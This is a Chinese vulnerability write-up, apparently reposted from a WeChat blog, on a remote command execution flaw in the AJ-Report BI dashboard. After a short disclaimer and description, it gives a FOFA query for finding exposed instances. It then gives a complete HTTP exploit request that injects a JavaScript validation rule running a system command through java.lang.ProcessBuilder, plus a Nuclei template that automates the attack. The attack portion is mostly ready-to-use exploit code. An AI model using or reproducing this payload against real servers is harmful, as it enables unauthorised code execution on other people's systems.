AJ-Report开源数据大屏 verification 远程命令执行漏洞

2024年5月7日15:24:56评论16 views字数 2214阅读7分22秒阅读模式

0x00 阅读须知

免责声明：本文提供的信息和方法仅供网络安全专业人员用于教学和研究目的，不得用于任何非法活动。读者若使用文章内容从事任何未授权的行为，需自行承担所有法律责任和后果。本公众号及作者对由此引起的任何直接或间接损失不负责任。请严格遵守相关法律法规。

0x01 漏洞简介

AJ-Report是一个完全开源的BI平台，酷炫大屏展示，能随时随地掌控业务动态，让每个决策都有数据支撑。这个系统被发现存在远程命令执行漏洞。

AJ-Report开源数据大屏 verification 远程命令执行漏洞

0x02 漏洞详情

fofa：title="AJ-Report"

Poc：

POST /dataSetParam/verification;swagger-ui/ HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Content-Length: 339Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/json;charset=UTF-8{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder("id").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

AJ-Report开源数据大屏 verification 远程命令执行漏洞

0x03 Nuclie

id: AJ_Report-verification-RCEinfo:  name: AJ_Report-verification-RCE  author: yunkong  severity: high  description: AJ-Report开源数据大屏 verification 远程命令执行漏洞  tags: AJ_Report,rcehttp:  - raw:      - |-        POST /dataSetParam/verification;swagger-ui/ HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7        Accept-Encoding: gzip, deflate, br        Accept-Language: zh-CN,zh;q=0.9        Content-Type: application/json;charset=UTF-8        Connection: close        Content-Length: 339        {"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder("id").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}    matchers-condition: and    matchers:      - type: binary        part: body        binary:          - 226d657373616765223a22e6938de4bd      - type: word        part: body        words:          - '"code":"200"'      - type: word        part: body        words:          - 'uid'      - type: status        status:          - 200

AJ-Report开源数据大屏 verification 远程命令执行漏洞

原文始发于微信公众号（贫僧法号云空）：AJ-Report开源数据大屏 verification 远程命令执行漏洞

左青龙
微信扫一扫

右白虎
微信扫一扫

AJ-Report开源数据大屏 verification 远程命令执行漏洞

0x01 漏洞简介

0x02 漏洞详情

某浏览系统存在延时注入

【漏洞复现】cockpit系统assetsmanager/upload接口存在文件上传漏洞 | 附poc

Weblogic任意文件上传漏洞

【已复现】(CVE-2023-39361)Cacti 未授权SQL注入漏洞

【已复现】致远OA前台任意用户密码修改漏洞

【漏洞复现】Juniper JunOS SRX EX 远程命令执行漏洞 CVE-2023-36844

CVE-2022-47966 SAML RCE

Openfire 身份认证绕过漏洞复现

Alibaba AnyProxy fetchBody 任意文件读取漏洞

发表评论

在线咨询

微信